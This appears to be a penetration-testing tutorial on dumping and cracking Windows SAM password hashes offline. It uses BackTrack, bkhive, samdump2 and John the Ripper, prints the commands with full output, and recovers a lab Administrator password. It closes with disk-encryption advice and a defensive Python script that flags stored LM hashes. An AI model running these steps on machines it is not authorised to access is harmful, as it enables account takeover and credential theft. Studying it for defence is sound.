Simply drop in your BackTrack 5 CD or USB stick and boot from the inserted media. Once booted, type startx; you can do everything from the console, but it’s nicer to have a pretty GUI!
Left-click Places at the top and then click on the Windows partition you wish to mount.
Then open a terminal and, first of all, use bkhive to dump the SYSKEY bootkey from the Windows SYSTEM hive.
```
root@bt:~# bkhive /media/10B9-F2B6/WINNT/system32/config/SYSTEM /root/keyfile.txt
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : $$$PROTO.HIV
Default ControlSet: 001
Bootkey: 7abeb4c282eaef5bfa7a75c197be8f85
```
The next step is to use the SAM file along with the bootkey to get at the hashes:
```
root@bt:~# samdump2 /media/10B9-F2B6/WINNT/system32/config/SAM /root/keyfile.txt | tee hashes.txt
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : SAM
Administrator:500:1d9321d6da8213bdc4482861fc3ea9db:80290fc9b3c2b233769aa9d6ced8bc86:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ASPNET:1000:b50fd6425ebf847332ada17f89c09dc9:63c184dd474f5d902a830545d9bdcfad:::
IUSR_WEBINSPECT:1001:eeb699201309cb097b3ac7d5e9ecfe77:d61861bf937514d0a6dd9fbf4e7b8376:::
IWAM_WEBINSPECT:1002:7d5621a567c0b5433c884480b718e30a:a4283d74fda5cd3a65641d52873adb78:::
```
Now that we have the hashes we can start cracking them using brute-force or wordlist attacks. In this example I will use John the Ripper, as it’s just a quick demo, but you could also use ophcrack to make use of rainbow tables or hashcat to harness the power of your GPU.
```
root@bt:~# cd /pentest/passwords/john/
root@bt:/pentest/passwords/john# john /root/hashes.txt
Warning: detected hash type "lm", but the string is also recognized as "nt"
Use the "--format=nt" option to force loading these as that type instead
Warning: detected hash type "lm", but the string is also recognized as "nt2"
Use the "--format=nt2" option to force loading these as that type instead
Loaded 9 password hashes with no different salts (LM DES [128/128 BS SSE2])
                 (Guest)
NK               (Administrator:2)
HACMEBA          (Administrator:1)
guesses: 3  time: 0:00:00:39 0.01% (3)  c/s: 173509K  trying: 08529IK - 08527NI
Warning: passwords printed above might be partial
Use the "--show" option to display all of the cracked passwords reliably
Session aborted
```
Bingo! Looks like we’ve got the first and second parts of the 9-character password (LM splits it into two hashes, one covering 7 characters and the other the remaining 2 characters, which is the whole reason we use passwords of more than 14 characters!)
```
root@bt:/pentest/passwords/john# john --show /root/hashes.txt
Administrator:HACMEBANK:1d9321d6da8213bdc4482861fc3ea9db:80290fc9b3c2b233769aa9d6ced8bc86:::
Guest::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

3 password hashes cracked, 6 left
root@bt:/pentest/passwords/john#
```
Password = HACMEBANK
So the moral of the story is: use full disk encryption to protect against this type of attack (and, as an extra precaution, prevent booting from CD, DVD and removable media devices).
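As an added defensive example (not code from the original post): an audit script that reads a pwdump-format dump such as hashes.txt above and flags accounts that still store an LM hash, the weakness that let a 9-character password fall in 39 seconds, along with empty passwords. The Administrator and Guest lines are taken from the dump above; the svc_backup entry is constructed.

```python
import re

# LM hash stored when no LM password is kept (both 7-character halves empty).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# LM hashes each 7-character half independently, so a password of 7 or fewer
# characters leaves the second half equal to the empty half.
EMPTY_LM_HALF = EMPTY_LM[16:]

# user:rid:lmhash:nthash::: as printed by samdump2 / pwdump.
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):")

def parse_pwdump(text):
    """Yield (user, rid, lm, nt) for every well-formed line; skip the rest."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            yield user, int(rid), lm.lower(), nt.lower()

def audit(text):
    """Map each account with a weakness to a list of findings."""
    findings = {}
    for user, rid, lm, nt in parse_pwdump(text):
        issues = []
        if lm != EMPTY_LM:
            if lm[16:] == EMPTY_LM_HALF:
                issues.append("LM hash stored (password <= 7 chars)")
            else:
                issues.append("LM hash stored (password 8-14 chars)")
        if nt == EMPTY_NT:
            issues.append("empty password")
        if rid == 500 and issues:
            issues.append("built-in Administrator (RID 500)")
        if issues:
            findings[user] = issues
    return findings

# Constructed sample: the first two lines are the Administrator and Guest
# entries from the dump above; svc_backup is an invented account.
SAMPLE = """\
Administrator:500:1d9321d6da8213bdc4482861fc3ea9db:80290fc9b3c2b233769aa9d6ced8bc86:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1003:ffffffffffffffffaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""

if __name__ == "__main__":
    for user, issues in audit(SAMPLE).items():
        print(f"{user}: {', '.join(issues)}")
```

Any account reported with an LM hash is a candidate for the "Do not store LAN Manager hash value on next password change" policy followed by a password reset, since the LM hash is only removed when the password is next changed.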